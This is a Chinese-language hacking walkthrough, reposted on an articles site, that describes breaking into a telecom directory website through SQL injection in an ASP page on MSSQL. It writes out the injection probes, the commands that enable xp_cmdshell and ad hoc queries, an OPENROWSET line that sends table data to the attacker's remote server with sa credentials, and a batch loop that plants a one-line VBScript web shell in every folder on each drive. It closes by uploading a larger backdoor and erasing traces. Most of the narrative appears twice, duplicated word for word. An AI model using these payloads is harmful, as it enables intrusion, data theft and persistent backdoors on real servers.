MSSQL2005注入攻击
程序员文章站
2022-04-26 23:13:20
电信级的系统估计都是采用比较大型的数据库了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!兰州电信 号码百事通的网站 居然是用IIS ASP!呵呵!ASP估计脚本小子都玩得很熟悉了!... 08-10-08...
电信级的系统估计都是采用比较大型的数据库了吧~ 而且涉及到高速搜索方面的!出乎我意料之外呢!兰州电信 号码百事通的网站 居然是用iis asp!呵呵!asp估计脚本小子都玩得很熟悉了!-_- 而且asp不采用fso生成静态页面技术!
呵呵~其实注入点并不是那么好找的!毕竟是电信的大网站!测试了好多个点都失败,我个人比较喜欢找那些片偏僻的url连接!那些80%的程序员都会疏忽~! ok 来个经典 and 0=0 and 0=1 返回不一样的结果!看来是数字输入的了!
不说太多~ 再看看是什么数据库 跟asp结合 80% 都是mssql了!不过也有例外的~呵呵例如第2代身份证验证的网站 我记得有好几个是采用asp/aspx oracle 的!题外话就不多说了!来点直接的!
and exists(select @@version)-- 返回正常哦~ 呵呵看来不会是oracle其他了 要么就是sybase 要么就是 mssql
那再来看看 sybase 没有is_srvrolemember函数的!只有ms的才会有!而sybase判断权限就只有用show_role
and 1=(select is_srvrolemember('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是sa权限!
ok那么 就来个我的最爱 openrowset
先建一个表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into openrowset('sqloledb','xxx.xxx.xxx.1';'sa';'p','select * from northwind.dbo.dirtree')
select * from c--把远程的表导到我自己机器上的mssql
发现报告错误
不允许openrowset ~~ 奇怪?? 难道是mssql2005?权限问题?靠!那就开呗!幸好是sa权限
exec sp_configure 'ad hoc distributed queries',1;reconfigure;--开始分布式事务
现在来真的了!不过还是有我最担心的~ 就是web跟database是分离的!这样搞起来就郁闷了!ok!
既然是sa 那就把他的cmdshell都开了吧~
exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure;--
这样就可以开启cmdshell 但是还没有添加扩展存储过程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其实没有什么必要的~只是我为了方便防火墙!
再来执行 exec master..xp_cmdshell 'ping 自己ip' 防火墙检测到有对方ip ping自己了呵呵!然后再ping他的website
看来是同一个ip哦~ 哈哈!那就爽了!那我就直接在他本地写一个bat吧!
随便找个地方用xp_cmdshell写了个bat 内容为
for /r "c:\" %%v in (1.asp) do echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell执行 ok
在c盘下面所有文件夹都有这个1.asp了~ 呵呵 如此类推
把其他盘也感染.... 5分钟过后!~ 他的所有盘 所有文件夹都有这个 1.asp的一句话~ 哈哈!来到www.lanzhouxxxxx.com 在他的web上面传个大马子~ko~~... 记得收拾残局!把之前的垃圾清除~呵呵
and exists(select @@version)-- 返回正常哦~ 呵呵看来不会是oracle其他了 要么就是sybase 要么就是 mssql
那再来看看 sybase 没有is_srvrolemember函数的!只有ms的才会有!而sybase判断权限就只有用show_role
and 1=(select is_srvrolemember('sysadmin'))-- 喔? 返回正常哦 , 真大意啊~是sa权限!
ok那么 就来个我的最爱 openrowset
先建一个表
create table c(dir ntext,num int,f int)--
然后
insert c execute master..xp_dirtree 'c:\',1,1--
insert into openrowset('sqloledb','xxx.xxx.xxx.1';'sa';'p','select * from northwind.dbo.dirtree')
select * from c--把远程的表导到我自己机器上的mssql
发现报告错误
不允许openrowset ~~ 奇怪?? 难道是mssql2005?权限问题?靠!那就开呗!幸好是sa权限
exec sp_configure 'ad hoc distributed queries',1;reconfigure;--开始分布式事务
现在来真的了!不过还是有我最担心的~ 就是web跟database是分离的!这样搞起来就郁闷了!ok!
既然是sa 那就把他的cmdshell都开了吧~
exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 1;reconfigure;--
这样就可以开启cmdshell 但是还没有添加扩展存储过程
dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
其实没有什么必要的~只是我为了方便防火墙!
再来执行 exec master..xp_cmdshell 'ping 自己ip' 防火墙检测到有对方ip ping自己了呵呵!然后再ping他的website
看来是同一个ip哦~ 哈哈!那就爽了!那我就直接在他本地写一个bat吧!
随便找个地方用xp_cmdshell写了个bat 内容为
for /r "c:\" %%v in (1.asp) do echo ^<script language=vbscript runat=server^>execute request(^"z^")^</script^> >%%v
然后用他的xp_cmdshell执行 ok
在c盘下面所有文件夹都有这个1.asp了~ 呵呵 如此类推
把其他盘也感染.... 5分钟过后!~ 他的所有盘 所有文件夹都有这个 1.asp的一句话~ 哈哈!来到www.lanzhouxxxxx.com 在他的web上面传个大马子~ko~~... 记得收拾残局!把之前的垃圾清除~呵呵
上一篇: 分页式设计还是瀑布流滚动设计?信息量大的网站取舍指导
下一篇: 微信运营和微博运营的50条经验分享